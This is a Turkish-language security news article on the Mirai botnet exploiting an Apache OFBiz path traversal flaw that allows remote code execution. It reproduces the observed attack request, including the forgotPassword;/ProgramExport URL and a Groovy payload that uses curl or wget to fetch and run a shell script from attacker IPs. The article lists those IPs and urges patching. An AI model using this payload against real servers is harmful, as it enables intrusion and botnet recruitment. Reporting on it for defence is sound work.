Mirai Botnet Apache OFBiz Dizin Gezinme Güvenlik Açığına Saldırıyor


Kötü şöhretli Mirai botnetinin, yakın zamanda açıklanan Apache OFBiz’deki bir dizin gezinme güvenlik açığını istismar ettiği gözlemlendi.

Apache Vakfı tarafından desteklenen bu Java tabanlı çerçeve, ticari alternatiflere göre daha az yaygın olmasına rağmen hassas iş verilerinin yönetimi için kritik öneme sahip olan ERP (Kurumsal Kaynak Planlama) uygulamalarının oluşturulmasında kullanılıyor.

Güvenlik Açığı Ayrıntıları ve İstismarı

SANS raporlarına göre, Mayıs 2024’te yamalanan güvenlik açığı, OFBiz’in 18.12.13 öncesi sürümlerini etkiliyor. Yol geçişi açığı aracılığıyla uzaktan komut yürütülmesine izin veriyor.

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

Bu kusur, bir URL’ye noktalı virgül eklenerek ve ardından kısıtlanmış bir URL eklenerek tetiklenebilir. Örneğin, /webtools/control/forgotPassword;/ProgramExport URL’si istismar edilebilir, çünkü “forgotPassword” kimlik doğrulaması gerektirmez ve “ProgramExport” keyfi kod yürütülmesine izin verir.

Bir saldırgan, bir URL parametresi veya bir istek gövdesi içeren bir POST isteği kullanarak bu güvenlik açığından yararlanabilir. Son zamanlardaki saldırılar aşağıdaki istismarı kullanarak gözlemlenmiştir:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl http://95.214.27.196/where/bin.sh
  • Kullanıcı Aracısı: Mozilla/5.0 (Linux; Linux x86_64; tr-TR) Gecko/20100101 Firefox/122.0
  • Ev sahibi: [victim IP address]
  • Kabul etmek: /
  • Yükseltme-Güvensiz-İstekleri: 1
  • Bağlantı: hayatta kal
  • İçerik türü: uygulama/x-www-form-urlencoded
  • İçerik Uzunluğu: 147
  • groovyProgram=yeni+İstisna+at(‘curl http://185.196.10.231/sh | sh -s ofbiz || wget -O- http://185.196.10.231/sh | sh -s ofbiz’.execute().text);

Mirai Botnet Etkinliği

rapor
rapor

95.214.27.196 ve 185.196.10.231 IP adreslerinin kötü amaçlı yazılım barındırdığı ve dağıttığı, 83.222.191.62 IP adresinin ise istek gövdesinde istismar gönderdiği tespit edildi.

Bu IP’ler OFBiz güvenlik açığını aktif olarak tarıyor ve istismar ediyor; 185.196.10.231 IP’si daha önce IoT güvenlik açıklarını taramada kullanılmıştı.

Güvenlik açığı ayrıntıları kamuoyuna açıklandığından beri, OFBiz’i hedef alan taramalarda önemli bir artış oldu ve günlük neredeyse 2000 taramaya ulaştı. Bu artış, saldırganların aktif olarak bu güvenlik açığını denediğini ve potansiyel olarak Mirai gibi botnet’lere dahil ettiğini gösteriyor.

Apache OFBiz kullanan kuruluşların bu kritik güvenlik açığını azaltmak için en son güvenlik güncellemelerini acilen uygulamaları gerekir.

Mirai botnetinin bu kadar hızlı bir şekilde istismar edilmesi, hassas işletme verilerini siber tehditlerden korumak için zamanında yama yapmanın ve dikkatli izleme yapmanın önemini vurguluyor.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access



Source link